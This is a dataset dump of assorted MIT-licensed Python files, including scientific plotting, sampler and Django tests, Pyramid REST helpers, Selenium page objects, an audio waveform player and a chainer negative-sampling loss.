code stringlengths 2 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int32 2 1.05M |
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
"""
Contains functions to plot the results of the dustydiffusion test.
@author: ibackus
"""
import matplotlib.pyplot as plt
import numpy as np
import pynbody
import diskpy
#sim, epsEstimator, ts, runpars = analyze.loadSim(simdir)
def crossSection(sim, ts, crossSectionTimes=[0, 1, 10]):
"""
Reproduces the cross-section plot of dust density of
Price & Laibe 2015, fig. 5
Note, sim and ts can be loaded with analyze.loadSim(...)
Parameters
----------
sim : list
List of SimSnaps for the simulation
ts : array-like
Snapshot times
crossSectionTimes : array-like
(optional) Sim times to plot (approximate)
"""
# Select times to plot at
crossSectionTimes = np.asarray(crossSectionTimes)
crossSectionTimes = crossSectionTimes.reshape(crossSectionTimes.size)
if np.ndim(crossSectionTimes) == 0:
crossSectionTimes = crossSectionTimes[None]
nPlots = len(crossSectionTimes)
# Plot
axs = diskpy.plot.gridplot(1, nPlots, square=True)
fig = plt.gcf()
for iPlot in range(nPlots):
ax = axs[iPlot]
iTime = abs(ts - crossSectionTimes[iPlot]).argmin()
t = ts[iTime]
f = sim[iTime]
im=pynbody.plot.sph.image(f, 'dustFrac', width=1, log=False, vmin=0,
vmax = 0.11, cmap='cubehelix_r',
show_cbar=False, subplot=ax, ret_im=True)
ax.set_xlabel('t={:.2g}'.format(float(t)))
fig.subplots_adjust(right=0.8)
cbar_ax = fig.add_axes([0.85, 0.2, 0.05, 0.6])
fig.colorbar(im, cax=cbar_ax)
fig.set_size_inches(8.5, 3.4, forward=True)
plt.suptitle('Cross section of dust fraction in z=0 plane\n'\
'See Price & Laibe (2015)')
def dustFracProfile(sim, ts, epsEstimator,
epsPlotTimes=[0., 0.1, 0.3, 1, 3, 10], nr=200,
colorcode=True, legend=True, rasterized=True):
"""
Note, sim and ts and epsEstimator can be loaded with analyze.loadSim(...)
Parameters
----------
sim : list
List of SimSnaps for the simulation
ts : array-like
Snapshot times
epsEstimator : function
A function of (r, t) that returns the analytic estimate of the dust
fraction density profile of P&L15 dustydiffusion
epsPlotTimes : array-like
Approximate times to plot at
nr : int
Number of radial bins
colorcode : bool
Color-code the times
legend : bool
Display legend
rasterized : bool
Rasterize the dots. Useful for saving figures as vector graphics
"""
# Make plot times an array
epsPlotTimes = np.asarray(epsPlotTimes)
epsPlotTimes = epsPlotTimes.reshape(epsPlotTimes.size)
nt = len(epsPlotTimes)
actualPlotTimes = np.zeros(nt)
title = 'plot times: '
if colorcode:
markercolor = None
else:
markercolor = 'k'
for iPlot in range(nt):
iTime = abs(ts - epsPlotTimes[iPlot]).argmin()
# Calculate stuff
f = sim[iTime]
t = ts[[iTime]]
actualPlotTimes[iPlot] = t
print t
r = np.linspace(0, f['r'].max(), nr)
epsAnalytic = epsEstimator(r, t)
# Plot
scatter=plt.plot(f['r'], f['dustFrac'], 'o', markersize=3,
markeredgecolor='none', label='t={:.2g}'.format(float(t)),
color=markercolor, rasterized=rasterized)
line=plt.plot(r, epsAnalytic, 'r')
if colorcode:
# Make lines and points the same color
line[0].set_color(scatter[0].get_color())
title += '{:.2g}, '.format(float(t))
# Set-up plot
plt.ylim(0, 0.11)
plt.xlim(0, 0.5)
plt.ylabel('Dust fraction')
plt.xlabel('r')
if legend:
plt.legend(loc='best', markerscale=2)
plt.title(title)
| ibackus/testdust | testdust/diffusion/plot.py | Python | mit | 4,000 |
# coding: utf-8
from django.test import TestCase
from django.db import IntegrityError
from datetime import datetime
from eventex.subscriptions.models import Subscription
class SubscriptionTest(TestCase):
def setUp(self):
self.obj = Subscription(
name='Henrique Bastos',
cpf='12345678901',
email='henrique@bastos.net',
phone='21-96186180'
)
def test_create(self):
"""
Subscription must have name, cpf, email, phone
"""
self.obj.save()
self.assertEqual(1, self.obj.pk)
def test_has_created_at(self):
"""
Subscription must have automatica created_at.
"""
self.obj.save()
self.assertIsInstance(self.obj.created_at, datetime)
def test_unicode(self):
self.assertEqual(u'Henrique Bastos', unicode(self.obj))
def test_paid_default_value_is_False(self):
"""
By default paid must be False.
"""
self.assertEqual(False, self.obj.paid)
class SubscriptionUniqueTest(TestCase):
def setUp(self):
# Create a first entry to force collision.
Subscription.objects.create(name='Henrique Bastos', cpf='12345678901',
email='henrique@bastos.net', phone='21-96186180')
def test_cpf_unique(self):
"""
CPF must be unique
"""
s = Subscription(name='Henrique Bastos', cpf='12345678901',
email='outro@email.com', phone='21-96186180')
self.assertRaises(IntegrityError, s.save)
def test_email_can_repeat(self):
"""
Email is not unique anymore.
"""
s = Subscription.objects.create(name='Henrique Bastos', cpf='00000000011',
email='henrique@bastos.net')
self.assertEqual(2, s.pk)
| klebercode/lionsclub | eventi/subscriptions/tests/test_models.py | Python | mit | 1,854 |
import unittest
import numpy as np
from pgmpy.factors.continuous import JointGaussianDistribution as JGD
from pgmpy.sampling import (HamiltonianMC as HMC, HamiltonianMCDA as HMCda, GradLogPDFGaussian, NoUTurnSampler as NUTS,
NoUTurnSamplerDA as NUTSda)
class TestHMCInference(unittest.TestCase):
def setUp(self):
mean = [-1, 1, -1]
covariance = np.array([[3, 0.8, 0.2], [0.8, 2, 0.3], [0.2, 0.3, 1]])
self.test_model = JGD(['x', 'y', 'z'], mean, covariance)
self.hmc_sampler = HMCda(model=self.test_model, grad_log_pdf=GradLogPDFGaussian)
def test_errors(self):
with self.assertRaises(TypeError):
HMCda(model=self.test_model, grad_log_pdf=1)
with self.assertRaises(TypeError):
HMCda(model=self.test_model, grad_log_pdf=GradLogPDFGaussian, simulate_dynamics=1)
with self.assertRaises(ValueError):
HMCda(model=self.test_model, delta=-1)
with self.assertRaises(TypeError):
self.hmc_sampler.sample(initial_pos=1, num_adapt=1, num_samples=1, trajectory_length=1)
with self.assertRaises(TypeError):
self.hmc_sampler.generate_sample(1, 1, 1, 1).send(None)
with self.assertRaises(TypeError):
HMC(model=self.test_model).sample(initial_pos=1, num_samples=1, trajectory_length=1)
with self.assertRaises(TypeError):
HMC(model=self.test_model).generate_sample(1, 1, 1).send(None)
def test_acceptance_prob(self):
acceptance_probability = self.hmc_sampler._acceptance_prob(np.array([1, 2, 3]), np.array([2, 3, 4]),
np.array([1, -1, 1]), np.array([0, 0, 0]))
np.testing.assert_almost_equal(acceptance_probability, 0.0347363)
def test_find_resonable_stepsize(self):
np.random.seed(987654321)
stepsize = self.hmc_sampler._find_reasonable_stepsize(np.array([-1, 1, -1]))
np.testing.assert_almost_equal(stepsize, 2.0)
def test_adapt_params(self):
stepsize, stepsize_bar, h_bar = self.hmc_sampler._adapt_params(0.0025, 1, 1, np.log(0.025), 2, 1)
np.testing.assert_almost_equal(stepsize, 3.13439452e-13)
np.testing.assert_almost_equal(stepsize_bar, 3.6742481e-08)
np.testing.assert_almost_equal(h_bar, 0.8875)
def test_sample(self):
# Seeding is done for _find_reasonable_stepsize method
# Testing sample method simple HMC
np.random.seed(3124141)
samples = self.hmc_sampler.sample(initial_pos=[0.3, 0.4, 0.2], num_adapt=0,
num_samples=10000, trajectory_length=4)
covariance = np.cov(samples.values.T)
self.assertTrue(np.linalg.norm(covariance - self.test_model.covariance) < 3)
# Testing sample of method of HMCda
np.random.seed(3124141)
samples = self.hmc_sampler.sample(initial_pos=[0.6, 0.2, 0.8], num_adapt=10000,
num_samples=10000, trajectory_length=4)
covariance = np.cov(samples.values.T)
self.assertTrue(np.linalg.norm(covariance - self.test_model.covariance) < 0.3)
# Testing generate_sample method of simple HMC
np.random.seed(3124141)
gen_samples = self.hmc_sampler.generate_sample(initial_pos=[0.3, 0.4, 0.2], num_adapt=0,
num_samples=10000, trajectory_length=4)
samples = np.array([sample for sample in gen_samples])
covariance = np.cov(samples.T)
self.assertTrue(np.linalg.norm(covariance - self.test_model.covariance) < 3)
# Testing sample of method of HMCda
np.random.seed(3124141)
gen_samples = self.hmc_sampler.generate_sample(initial_pos=[0.6, 0.2, 0.8], num_adapt=10000,
num_samples=10000, trajectory_length=4)
samples = np.array([sample for sample in gen_samples])
covariance = np.cov(samples.T)
self.assertTrue(np.linalg.norm(covariance - self.test_model.covariance) < 0.3)
def tearDown(self):
del self.hmc_sampler
del self.test_model
class TestNUTSInference(unittest.TestCase):
def setUp(self):
mean = np.array([-1, 1, 0])
covariance = np.array([[6, 0.7, 0.2], [0.7, 3, 0.9], [0.2, 0.9, 1]])
self.test_model = JGD(['x', 'y', 'z'], mean, covariance)
self.nuts_sampler = NUTSda(model=self.test_model, grad_log_pdf=GradLogPDFGaussian)
def test_errors(self):
with self.assertRaises(TypeError):
NUTS(model=self.test_model, grad_log_pdf=JGD)
with self.assertRaises(TypeError):
NUTS(model=self.test_model, grad_log_pdf=None, simulate_dynamics=GradLogPDFGaussian)
with self.assertRaises(ValueError):
NUTSda(model=self.test_model, delta=-0.2, grad_log_pdf=None)
with self.assertRaises(ValueError):
NUTSda(model=self.test_model, delta=1.1, grad_log_pdf=GradLogPDFGaussian)
with self.assertRaises(TypeError):
NUTS(self.test_model, GradLogPDFGaussian).sample(initial_pos={1, 1, 1}, num_samples=1)
with self.assertRaises(ValueError):
NUTS(self.test_model, GradLogPDFGaussian).sample(initial_pos=[1, 1], num_samples=1)
with self.assertRaises(TypeError):
NUTSda(self.test_model, GradLogPDFGaussian).sample(initial_pos=1, num_samples=1, num_adapt=1)
with self.assertRaises(ValueError):
NUTSda(self.test_model, GradLogPDFGaussian).sample(initial_pos=[1, 1, 1, 1], num_samples=1, num_adapt=1)
with self.assertRaises(TypeError):
NUTS(self.test_model, GradLogPDFGaussian).generate_sample(initial_pos=0.1, num_samples=1).send(None)
with self.assertRaises(ValueError):
NUTS(self.test_model, GradLogPDFGaussian).generate_sample(initial_pos=(0, 1, 1, 1),
num_samples=1).send(None)
with self.assertRaises(TypeError):
NUTSda(self.test_model, GradLogPDFGaussian).generate_sample(initial_pos=[[1, 2, 3]], num_samples=1,
num_adapt=1).send(None)
with self.assertRaises(ValueError):
NUTSda(self.test_model, GradLogPDFGaussian).generate_sample(initial_pos=[1], num_samples=1,
num_adapt=1).send(None)
def test_sampling(self):
np.random.seed(1010101)
samples = self.nuts_sampler.sample(initial_pos=[-0.4, 1, 3.6], num_adapt=0, num_samples=10000,
return_type='recarray')
sample_array = np.array([samples[var_name] for var_name in self.test_model.variables])
sample_covariance = np.cov(sample_array)
self.assertTrue(np.linalg.norm(sample_covariance - self.test_model.covariance) < 3)
np.random.seed(1210161)
samples = self.nuts_sampler.generate_sample(initial_pos=[-0.4, 1, 3.6], num_adapt=0, num_samples=10000)
samples_array = np.array([sample for sample in samples])
sample_covariance = np.cov(samples_array.T)
self.assertTrue(np.linalg.norm(sample_covariance - self.test_model.covariance) < 3)
np.random.seed(12313131)
samples = self.nuts_sampler.sample(initial_pos=[0.2, 0.4, 2.2], num_adapt=10000, num_samples=10000)
sample_covariance = np.cov(samples.values.T)
self.assertTrue(np.linalg.norm(sample_covariance - self.test_model.covariance) < 0.4)
np.random.seed(921312312)
samples = self.nuts_sampler.generate_sample(initial_pos=[0.2, 0.4, 2.2], num_adapt=10000, num_samples=10000)
samples_array = np.array([sample for sample in samples])
sample_covariance = np.cov(samples_array.T)
self.assertTrue(np.linalg.norm(sample_covariance - self.test_model.covariance) < 0.4)
def tearDown(self):
del self.test_model
del self.nuts_sampler
| sandeepkrjha/pgmpy | pgmpy/tests/test_sampling/test_continuous_sampling.py | Python | mit | 8,100 |
import io
import unittest
from unittest.mock import patch
from kattis import k_hnumbers
###############################################################################
class SampleInput(unittest.TestCase):
'''Problem statement sample inputs and outputs'''
def test_sample_input(self):
'''Run and assert problem statement sample input and output.'''
inputs = []
inputs.append('21')
inputs.append('85')
inputs.append('789')
inputs.append('0')
inputs = '\n'.join(inputs) + '\n'
outputs = []
outputs.append('21 0')
outputs.append('85 5')
outputs.append('789 62')
outputs = '\n'.join(outputs) + '\n'
with patch('sys.stdin', io.StringIO(inputs)) as stdin,\
patch('sys.stdout', new_callable=io.StringIO) as stdout:
k_hnumbers.main()
self.assertEqual(stdout.getvalue(), outputs)
self.assertEqual(stdin.read(), '')
###############################################################################
if __name__ == '__main__':
unittest.main()
| ivanlyon/exercises | test/test_k_hnumbers.py | Python | mit | 1,101 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
package documentation
"""
from Automation.instancelist import main
if __name__ == '__main__':
main()
| appcito/automation-tool | instancelist-cli.py | Python | mit | 163 |
# -*- coding: utf-8 -*-
"""
Useful classes and methods to aid RESTful webservice development in Pyramid.
PythonPro Limited
2012-01-14
"""
import json
import httplib
import logging
import traceback
#from decorator import decorator
from pyramid.request import Response
def get_log(e=None):
return logging.getLogger("{0}.{1}".format(__name__, e) if e else __name__)
def json_result(view_callable):
"""Return a result dict for a response.
rc = {
"success": True | False,
"data": ...,
"message", "ok" | "..message explaining result=False..",
}
the data field will contain whatever is returned from the response
normal i.e. any valid type.
"""
#log = get_log('json_result')
def inner(request, *args):
"""Add the success status wrapper. exceptions will be
handled elsewhere.
"""
response = dict(success=True, data=None, message="ok")
response['data'] = view_callable(request, *args)
return response
return inner
def status_body(
success=True, data=None, message="", to_json=False, traceback='',
):
"""Create a JSON response body we will use for error and other situations.
:param success: Default True or False.
:param data: Default "" or given result.
:param message: Default "ok" or a user given message string.
:param to_json: Default True, return a JSON string or dict is False.
the to_json is used in situations where something else will take care
of to JSON conversion.
:returns: JSON status response body.
The default response is::
json.dumps(dict(
success=True | False,
data=...,
message="...",
))
"""
# TODO: switch tracebacks off for production
body = dict(
success=success,
data=data,
message=message,
)
if traceback:
body['traceback'] = traceback
if to_json:
body = json.dumps(body)
return body
def status_err(exc, tb):
""" Generate an error status response from an exception and traceback
"""
return status_body("error", str(exc), exc.__class__.__name__, tb,
to_json=False)
#@decorator
def status_wrapper(f, *args, **kw):
""" Decorate a view function to wrap up its response in the status_body
gumph from above, and handle all exceptions.
"""
try:
res = f(*args, **kw)
return status_body(message=res, to_json=False)
except Exception, e:
tb = traceback.format_exc()
get_log().exception(tb)
return status_err(e, tb)
def notfound_404_view(request):
"""A custom 404 view returning JSON error message body instead of HTML.
:returns: a JSON response with the body::
json.dumps(dict(error="URI Not Found '...'"))
"""
msg = str(request.exception.message)
get_log().info("notfound_404_view: URI '%s' not found!" % str(msg))
request.response.status = httplib.NOT_FOUND
request.response.content_type = "application/json"
body = status_body(
success=False,
message="URI Not Found '%s'" % msg,
)
return Response(body)
def xyz_handler(status):
"""A custom xyz view returning JSON error message body instead of HTML.
:returns: a JSON response with the body::
json.dumps(dict(error="URI Not Found '...'"))
"""
log = get_log()
def handler(request):
msg = str(request.exception.message)
log.info("xyz_handler (%s): %s" % (status, str(msg)))
#request.response.status = status
#request.response.content_type = "application/json"
body = status_body(
success=False,
message=msg,
to_json=True,
)
rc = Response(body)
rc.status = status
rc.content_type = "application/json"
return rc
return handler
# Reference:
# * http://zhuoqiang.me/a/restful-pyramid
#
class HttpMethodOverrideMiddleware(object):
'''WSGI middleware for overriding HTTP Request Method for RESTful support
'''
def __init__(self, application):
self.application = application
def __call__(self, environ, start_response):
if 'POST' == environ['REQUEST_METHOD']:
override_method = ''
# First check the "_method" form parameter
# if 'form-urlencoded' in environ['CONTENT_TYPE']:
# from webob import Request
# request = Request(environ)
# override_method = request.str_POST.get('_method', '').upper()
# If not found, then look for "X-HTTP-Method-Override" header
if not override_method:
override_method = environ.get(
'HTTP_X_HTTP_METHOD_OVERRIDE', ''
).upper()
if override_method in ('PUT', 'DELETE', 'OPTIONS', 'PATCH'):
# Save the original HTTP method
method = environ['REQUEST_METHOD']
environ['http_method_override.original_method'] = method
# Override HTTP method
environ['REQUEST_METHOD'] = override_method
return self.application(environ, start_response)
class JSONErrorHandler(object):
"""Capture exceptions usefully and return to aid the client side.
:returns: status_body set for an error.
E.g.::
rc = {
"success": True | False,
"data": ...,
"message", "ok" | "..message explaining result=False..",
}
the data field will contain whatever is returned from the response
normal i.e. any valid type.
"""
def __init__(self, application):
self.app = application
self.log = get_log("JSONErrorHandler")
def formatError(self):
"""Return a string representing the last traceback.
"""
exception, instance, tb = traceback.sys.exc_info()
error = "".join(traceback.format_tb(tb))
return error
def __call__(self, environ, start_response):
try:
return self.app(environ, start_response)
except Exception, e:
self.log.exception("error: ")
ctype = environ.get('CONTENT_TYPE')
if ctype == "application/json":
self.log.debug("Request was in JSON responding with JSON.")
errmsg = "%d %s" % (
httplib.INTERNAL_SERVER_ERROR,
httplib.responses[httplib.INTERNAL_SERVER_ERROR]
)
start_response(errmsg, [('Content-Type', 'application/json')])
message = str(e)
error = "%s" % (type(e).__name__)
self.log.error("%s: %s" % (error, message))
return status_body(
success=False,
# Should this be disabled on production?
data=self.formatError(),
message=message,
# I need to JSON encode it as the view never finished and
# the requestor is expecting a JSON response status.
to_json=True,
)
else:
raise
| oisinmulvihill/stats-service | stats_service/service/restfulhelpers.py | Python | mit | 7,229 |
from django import forms
from django.forms.models import inlineformset_factory
from cruditor.forms import (
CruditorFormsetFormMixin, CruditorFormsetMixin, CruditorTapeformMixin)
from examples.store.models import Person, RelatedPerson
class PersonForm(CruditorTapeformMixin, forms.ModelForm):
reminder = forms.SplitDateTimeField()
class Meta:
model = Person
fields = '__all__'
class RelatedPersonForm(CruditorFormsetFormMixin, forms.ModelForm):
class Meta:
model = RelatedPerson
fields = '__all__'
class RelatedPersonFormset(CruditorFormsetMixin, inlineformset_factory(
Person, RelatedPerson, extra=1, form=RelatedPersonForm
)):
pass
| moccu/django-cruditor | examples/formset/forms.py | Python | mit | 700 |
from hubcheck.pageobjects.basepageobject import BasePageObject
from hubcheck.pageobjects.basepageelement import Link
from selenium.common.exceptions import NoSuchElementException
class GenericPage(BasePageObject):
"""Generic Page with just a header and footer"""
def __init__(self,browser,catalog):
super(GenericPage,self).__init__(browser,catalog)
self.path = '/'
# load hub's classes
GenericPage_Locators = self.load_class('GenericPage_Locators')
NeedHelpForm = self.load_class('NeedHelpForm')
Header = self.load_class('Header')
Footer = self.load_class('Footer')
# update this object's locator
self.locators = GenericPage_Locators.locators
# setup page object's components
self.needhelpform = NeedHelpForm(self,{},self.__refreshCaptchaCB)
self.needhelplink = Link(self,{'base':'needhelplink'})
self.header = Header(self)
# self.footer = Footer(self)
def __refreshCaptchaCB(self):
self._browser.refresh()
self.needhelplink.click()
def goto_login(self):
return self.header.goto_login()
def goto_register(self):
return self.header.goto_register()
def goto_logout(self):
return self.header.goto_logout()
def goto_myaccount(self):
return self.header.goto_myaccount()
def goto_profile(self):
return self.header.goto_profile()
def toggle_needhelp(self):
return self.needhelplink.click()
def is_logged_in(self):
"""check if user is logged in, returns True or False"""
return self.header.is_logged_in()
def get_account_number(self):
"""return the account number of a logged in user based on urls"""
if not self.is_logged_in():
raise RuntimeError("user is not logged in")
return self.header.get_account_number()
def get_debug_info(self):
rtxt = []
for e in self.find_elements(self.locators['debug']):
if e.is_displayed():
rtxt.append(e.text)
return rtxt
def get_notification_info(self):
rtxt = []
for e in self.find_elements(self.locators['notification']):
if e.is_displayed():
rtxt.append(e.text)
return rtxt
def get_success_info(self):
rtxt = []
for e in self.find_elements(self.locators['success']):
if e.is_displayed():
rtxt.append(e.text)
return rtxt
def get_error_info(self):
rtxt = []
for e in self.find_elements(self.locators['error']):
if e.is_displayed():
rtxt.append(e.text)
return rtxt
def get_errorbox_info(self):
rtxt = []
for e in self.find_elements(self.locators['errorbox1']):
if e.is_displayed():
rtxt.append(e.text)
for e in self.find_elements(self.locators['errorbox2']):
if e.is_displayed():
rtxt.append(e.text)
return rtxt
class GenericPage_Locators_Base_1(object):
"""
locators for GenericPage object
"""
locators = {
'needhelplink' : "css=#tab",
'debug' : "css=#system-debug",
'error' : "css=.error",
'success' : "css=.passed",
'notification' : "css=#page_notifications",
'errorbox1' : "css=#errorbox",
'errorbox2' : "css=#error-box",
}
| codedsk/hubcheck | hubcheck/pageobjects/po_generic_page.py | Python | mit | 3,505 |
from datetime import datetime
from argparse import ArgumentParser
import pprint
import time
import warnings
import os, sys, io
import signal
import beretta
import importlib
__author__ = 'holly'
class Parser(object):
def __init__(self):
self.parser = ArgumentParser(description=beretta.__doc__)
self.parser.add_argument('--version', action='version', version='%(prog)s ' + beretta.__version__)
self.subparsers = self.parser.add_subparsers(help='sub-command --help', dest='subparser_name')
def run(self, loader=None):
if loader is None:
loader = importlib.import_module("beretta.loader").Loader()
plugins = {}
for (name, import_plugin) in loader.plugins():
plugin = import_plugin.Plugin(name)
plugin_parser = self.subparsers.add_parser(plugin.name, help=plugin.help, description=plugin.desc)
for args, kwargs in plugin.arguments():
plugin_parser.add_argument(*args, **kwargs)
plugins[name] = plugin
args = self.parser.parse_args()
if args.subparser_name in plugins:
plugins[args.subparser_name].run_plugin(args)
else:
self.parser.print_help()
| holly/beretta | lib/beretta/parser.py | Python | mit | 1,231 |
import alsaaudio
from math import pi, sin, pow
import getch
SAMPLE_RATE = 44100
FORMAT = alsaaudio.PCM_FORMAT_U8
PERIOD_SIZE = 512
N_SAMPLES = 1024
notes = "abcdefg"
frequencies = {}
for i, note in enumerate(notes):
frequencies[note] = 440 * pow(pow(2, 1/2), i)
# Generate the sine wave, centered at y=128 with 1024 samples
sine_wave = [int(sin(x * 2*pi/N_SAMPLES) * 127) for x in range(0, N_SAMPLES)]
square_wave = []
sawtooth_wave = []
triangle_wave = []
for i in range(0, N_SAMPLES):
phase = (i * 2*pi / N_SAMPLES) % 2*pi
if phase < pi:
square_wave.append(127)
else:
square_wave.append(-128)
sawtooth_wave.append(int(127 - (127 // pi * phase)))
if phase < pi:
triangle_wave.append(int(-127 + (2 * 127 * phase // pi)))
else:
triangle_wave.append(int(3 * 127 - (2 * 127 * phase // pi)))
def main():
buf = bytearray(PERIOD_SIZE)
# alsaaudio setup
dev = alsaaudio.PCM(type=alsaaudio.PCM_PLAYBACK)
dev.setchannels(1)
dev.setrate(SAMPLE_RATE)
dev.setformat(FORMAT)
dev.setperiodsize(PERIOD_SIZE)
#load_buf(buf, 440)
f = 440
w_half = [x//2 + 128 for x in make_wave(sine_wave, f)]
#w_o1 = [x//4 for x in make_wave(f*2)]
#w_o2 = [x//6 for x in make_wave(f*3)]
#w_o3 = [x//8 for x in make_wave(f*4)]
#w_o4 = [x//10 for x in make_wave(f*5)]
#w_o4 = [x//12 for x in make_wave(f*6)]
#w_o5 = [x//14 for x in make_wave(f*7)]
#w_o6 = [x//16 for x in make_wave(f*8)]
#for i, samp in enumerate(w_o1):
# w[i] += samp + w_o2[i] + w_o3[i] + w_o4[i] + w_o5[i] + w_o6[i] + 128
# print(w[i])
#buf = bytearray(w)
#for i, samp in enumerate(w):
# if samp > 0:
# samp = 127
# else:
# samp = -128
w = [x + 128 for x in make_wave(square_wave, 440)]
buf = bytearray(w)
char = getch.getch()
last = 'q'
while char != 'q':
if char != last:
if char == '1':
w = [x//2 + 128 for x in make_wave(sine_wave, 440)]
buf = bytearray(w)
elif char == '2':
w = [x//2 + 128 for x in make_wave(square_wave, 440)]
buf = bytearray(w)
elif char == '3':
w = [x//2 + 128 for x in make_wave(sawtooth_wave, 440)]
buf = bytearray(w)
elif char == '4':
w = [x//2 + 128 for x in make_wave(triangle_wave, 440)]
buf = bytearray(w)
elif char == '5':
buf = bytearray(w_half)
dev.write(buf)
dev.write(buf)
dev.write(buf)
last = char
char = getch.getch()
return 0
#def load_buf(buf, frequency):
# step = N_SAMPLES * frequency // SAMPLE_RATE
# for i in range(0, PERIOD_SIZE):
# buf[i] = wave[(step * i * N_SAMPLES // PERIOD_SIZE) % N_SAMPLES]
# return buf
def make_wave(wave, frequency):
step = N_SAMPLES * frequency // SAMPLE_RATE
w = []
for i in range(0, PERIOD_SIZE):
w.append(wave[(step * i * N_SAMPLES // PERIOD_SIZE) % N_SAMPLES])
return w
if __name__ == '__main__':
main()
| zmarvel/playground | sound/testplay.py | Python | mit | 3,152 |
#!/usr/bin/env python
# coding: utf-8
import logging
import config
def get_common_logger(name='common', logfile=None):
'''
args: name (str): logger name
logfile (str): log file, use stream handler (stdout) as default.
return:
logger obj
'''
my_logger = logging.getLogger(name)
my_logger.setLevel(config.LOG_LEVEL)
if logfile:
handler = logging.FileHandler(logfile)
else:
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s - %(name)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s')
handler.setFormatter(formatter)
my_logger.addHandler(handler)
# Stop logger propagate, forbiden duplicate log.
my_logger.propagate = False
return my_logger
COMMON_LOGGER = get_common_logger('common logger')
if __name__ == '__main__':
COMMON_LOGGER.debug('test')
| WisZhou/websocket_messager | utils.py | Python | mit | 904 |
import numpy
import six
from chainer import cuda
from chainer import function
from chainer.utils import type_check
class NegativeSamplingFunction(function.Function):
def __init__(self, sampler, sample_size):
self.sampler = sampler
self.sample_size = sample_size
def _make_samples(self, t):
if hasattr(self, 'samples'):
return self.samples # for testing
size = int(t.shape[0])
# first one is the positive, and others are sampled negatives
samples = self.sampler((size, self.sample_size + 1))
samples[:, 0] = t
self.samples = samples
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 3)
x_type, t_type, w_type = in_types
type_check.expect(
x_type.dtype == numpy.float32,
x_type.ndim == 2,
t_type.dtype == numpy.int32,
t_type.ndim == 1,
x_type.shape[0] == t_type.shape[0],
w_type.dtype == numpy.float32,
w_type.ndim == 2,
)
def forward_cpu(self, inputs):
x, t, W = inputs
self._make_samples(t)
loss = numpy.float32(0.0)
for i, (ix, k) in enumerate(six.moves.zip(x, self.samples)):
w = W[k]
f = w.dot(ix)
f[0] *= -1 # positive sample
loss += numpy.sum(numpy.logaddexp(f, 0))
return numpy.array(loss, numpy.float32),
def forward_gpu(self, inputs):
x, t, W = inputs
n_in = x.shape[1]
self._make_samples(t)
self.wx = cuda.elementwise(
'raw T W, raw T x, S k, int32 c, int32 m', 'T wx',
'''
T f = 0;
for (int j = 0; j < c; ++j) {
int x_ind[] = {(i / m), j};
int w_ind[] = {k, j};
f += x[x_ind] * W[w_ind];
}
wx = f;
''',
'negative_sampling_wx'
)(W, x, self.samples, n_in, self.sample_size + 1)
y = cuda.elementwise(
'T wx, int32 c, int32 m', 'T y',
'''
T f = wx;
if (i % m == 0) {
f = -f;
}
T loss;
if (f < 0) {
loss = __logf(1 + __expf(f));
} else {
loss = f + __logf(1 + __expf(-f));
}
y = loss;
''',
'negative_sampling_forward'
)(self.wx, n_in, self.sample_size + 1)
# TODO(okuta): merge elementwise
loss = cuda.cupy.sum(y)
return loss,
def backward_cpu(self, inputs, grads):
x, t, W = inputs
gloss, = grads
gx = numpy.zeros_like(x)
gW = numpy.zeros_like(W)
for i, (ix, k) in enumerate(six.moves.zip(x, self.samples)):
w = W[k]
f = w.dot(ix)
# g == -y * gloss / (1 + exp(yf))
f[0] *= -1
g = gloss / (1 + numpy.exp(-f))
g[0] *= -1
gx[i] = g.dot(w)
for ik, ig in six.moves.zip(k, g):
gW[ik] += ig * ix
return gx, None, gW
def backward_gpu(self, inputs, grads):
cupy = cuda.cupy
x, t, W = inputs
gloss, = grads
n_in = x.shape[1]
g = cuda.elementwise(
'T wx, raw T gloss, int32 m', 'T g',
'''
T y;
if (i % m == 0) {
y = 1;
} else {
y = -1;
}
g = -y * gloss[0] / (1.0f + __expf(wx * y));
''',
'negative_sampling_calculate_g'
)(self.wx, gloss, self.sample_size + 1)
gx = cupy.zeros_like(x)
cuda.elementwise(
'raw T g, raw T W, raw S k, int32 c, int32 m', 'T gx',
'''
int d = i / c;
T w = 0;
for (int j = 0; j < m; ++j) {
w += g[d * m + j] * W[k[d * m + j] * c + i % c];
}
gx = w;
''',
'negative_sampling_calculate_gx'
)(g, W, self.samples, n_in, self.sample_size + 1, gx)
gW = cupy.zeros_like(W)
cuda.elementwise(
'T g, raw T x, S k, int32 c, int32 m', 'raw T gW',
'''
T gi = g;
for (int j = 0; j < c; ++j) {
atomicAdd(&gW[k * c + j], gi * x[(i / m) * c + j]);
}
''',
'negative_sampling_calculate_gw'
)(g, x, self.samples, n_in, self.sample_size + 1, gW)
return gx, None, gW
def negative_sampling(x, t, W, sampler, sample_size):
"""Negative sampling loss function.
In natural language processing, especially language modeling, the number of
vocabulary is very large.
Therefore, you need to spend a lot of time to calculate the gradient of the
embedding matrix.
Instead, in negative sampling trick, you only need to calculate the
gradient for a few sampled negative examples.
The objective function is below:
.. math::
f(x, p) = \\log \\sigma(x^\\top w_p) + \\
k E_{i \\sim P(i)}[\\log \\sigma(- x^\\top w_i)],
where :math:`\\sigma(\\cdot)` is a sigmoid function, :math:`w_i` is the
weight vector for the word :math:`i`, and :math:`p` is a positive example.
It is approximated with :math:`k` examples :math:`N` sampled from
probability :math:`P(i)`, like this:
.. math::
f(x, p) \\approx \\log \\sigma(x^\\top w_p) + \\
\\sum_{n \\in N} \\log \\sigma(-x^\\top w_n).
Each sample of :math:`N` is drawn from the word distribution :math:`P(w)`.
This is calculated as :math:`P(w) = \\frac{1}{Z} c(w)^\\alpha`, where
:math:`c(w)` is the unigram count of the word :math:`w`, :math:`\\alpha` is
a hyper-parameter, and :math:`Z` is the normalization constant.
Args:
x (~chainer.Variable): Batch of input vectors.
t (~chainer.Variable): Vector of ground truth labels.
W (~chainer.Variable): Weight matrix.
sampler (~types.FunctionType): Sampling function. It takes a shape and
returns an integer array of the shape. Each element of this array
is a sample from the word distribution.
A :class:`~chainer.utils.WalkerAlias` object built with the power
distribution of word frequency is recommended.
sample_size (int): Number of samples.
See: `Distributed Representations of Words and Phrases and their\
Compositionality <http://arxiv.org/abs/1310.4546>`_
.. seealso:: :class:`~chainer.links.NegativeSampling`.
"""
